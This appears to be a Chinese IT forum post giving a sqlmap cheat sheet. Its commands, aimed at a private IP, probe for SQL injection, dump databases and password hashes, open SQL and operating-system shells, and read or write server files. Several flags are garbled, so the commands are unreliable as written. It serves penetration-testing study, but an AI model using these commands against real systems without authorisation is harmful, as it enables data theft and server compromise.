本站已运行

攻城狮论坛

xinmeng

作者: liuyaya
查看: 49|回复: 1

主题标签Tag

more +今日重磅推荐Recommend No.1

所有IT类厂商认证考试题库下载所有IT类厂商认证考试题库下载

more +随机图赏Gallery

重量级~~30多套JAVA就业班全套 视频教程(请尽快下载,链接失效后不补)重量级~~30多套JAVA就业班全套 视频教程(请尽快下载,链接失效后不补)
某linux大佬,积累多年的电子书(约300本)某linux大佬,积累多年的电子书(约300本)
乾颐堂现任明教教主Python完整版乾颐堂现任明教教主Python完整版
乾颐堂 教主技术进化论 2018-2019年 最新31-50期合集视频(各种最新技术杂谈视频)乾颐堂 教主技术进化论 2018-2019年 最新31-50期合集视频(各种最新技术杂谈视频)
Python学习视频 0起点视频 入门到项目实战篇 Python3.5.2视频教程 共847集 能学102天Python学习视频 0起点视频 入门到项目实战篇 Python3.5.2视频教程 共847集 能学102天
约21套Python视频合集 核心基础视频教程(共310G,已压缩)约21套Python视频合集 核心基础视频教程(共310G,已压缩)
最新20180811录制 IT爱好者-清风羽毛 - 网络安全IPSec VPN实验指南视频教程最新20180811录制 IT爱好者-清风羽毛 - 网络安全IPSec VPN实验指南视频教程
最新20180807录制EVE开机自启动虚拟路由器并桥接物理网卡充当思科路由器最新20180807录制EVE开机自启动虚拟路由器并桥接物理网卡充当思科路由器
最新2018/07/29录制 IT爱好者清风羽毛-Cisco IOS ZBF防火墙视频最新2018/07/29录制 IT爱好者清风羽毛-Cisco IOS ZBF防火墙视频
乾颐堂 教主技术进化论 2018年 最新1-30期合集视频(各种最新技术杂谈视频)乾颐堂 教主技术进化论 2018年 最新1-30期合集视频(各种最新技术杂谈视频)
Cisco CCW售前销售报价系统使用方法Cisco commerce workspaceCisco CCW售前销售报价系统使用方法Cisco commerce workspace
2018.6.20 广州 CCNA战报 908 PASS2018.6.20 广州 CCNA战报 908 PASS

[电脑技巧] sqlmap使用语法大全

[复制链接]
查看: 49|回复: 1
开通VIP 免金币+免回帖+批量下载+无广告
                       SQLMAP使用方法
1.判断是否存在注入点
命令:Python sqlmap.py -u http://192.168.1.104/?id=1
当注入点后面参数大于等于2个时,需要加双引号
命令:python sqlmap.py -u “http://192.168.1.104/?id=1&uid=2”
不设置参数进行判断
从文本中加载HTTP请求,将一个HTTP请求保存在文本中(GET ,POST)
命令:python sqlmap.py -r 地址/xx.txt
2.查询用户下所有的数据库
命令:Python sqlmap.py -u http://192.168.1.104/?id=1 –-dbs
3.查询数据库中的表名
命令:Python sqlmap.py -u http://192.168.1.104/?id=1 -D xx –tables
4.查询数据库中表的字段名
命令:Python sqlmap.py -u http://192.168.1.104/?id=1 -D xx –T xx–columns
5.查询字段的内容
命令:Python sqlmap.py -u http://192.168.1.104/?id=1 -D xx –T xx –Cxx –dump
6.获取数据库中所有用户
Python sqlmap.py -u http://192.168.1.104/?id=1 –users
7.获取数据库中用户密码
Python sqlmap.py -u http://192.168.1.104/?id=1 –passwords
8.获取当前网络数据库名称
Python sqlmap.py -u http://192.168.1.104/?id=1 –-current –db
9.获取数据库用户名称
Python sqlmap.py -u http://192.168.1.104/?id=1 –-current –user
10.探测等级(level(1-5))
通常一般探测等级为1,最高为5,sqlmap使用的payload可以自动破解出cookie,XFF等头部注入,一般使用level 3
命令: Python sqlmap.py -u http://192.168.1.104/?id=1 –dbs –level 3
11.查询用户是否为管理权限
如果有会返回true
Python sqlmap.py -u http://192.168.1.104/?id=1 –is-dba
12.—referer
当Sqlmap的level为3时,可以在请求头伪造http中的referer,尝试对referer注入,可以适应referer命令来欺骗
13.—sql-shell
该命令用于执行指定的SQL语句
Python sqlmap.py -u http://192.168.1.104/?id=1 –sql-shell
14.—os-cmd, --os-shell
该命令用于运行任意操作系统命令
Python sqlmap.py -u http://192.168.1.104/?id=1 –-os-cmd
Python sqlmap.py -u http://192.168.1.104/?id=1 –os-shell
15.—file-read
从数据库中读取文件
Python sqlmap.py -u http://192.168.1.104/?id=1 –file-read
16—file-write—file-dest
上传文件到数据库服务器中
Python sqlmap.py -u http://192.168.1.104/?id=1 –file-write—file-dest
8 J+ A' k7 ~, j" Q2 }
) A( p% ]" `, C
CCNA考试 官方正规报名 仅需1500元
回复 论坛版权

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|无图浏览|手机版|网站地图|攻城狮论坛

GMT+8, 2020-7-15 01:26 , Processed in 0.353345 second(s), 19 queries , Gzip On, Memcache On.

Powered by Discuz! X3.2 © 2001-2013 Comsenz Inc.

Designed by ARTERY.cn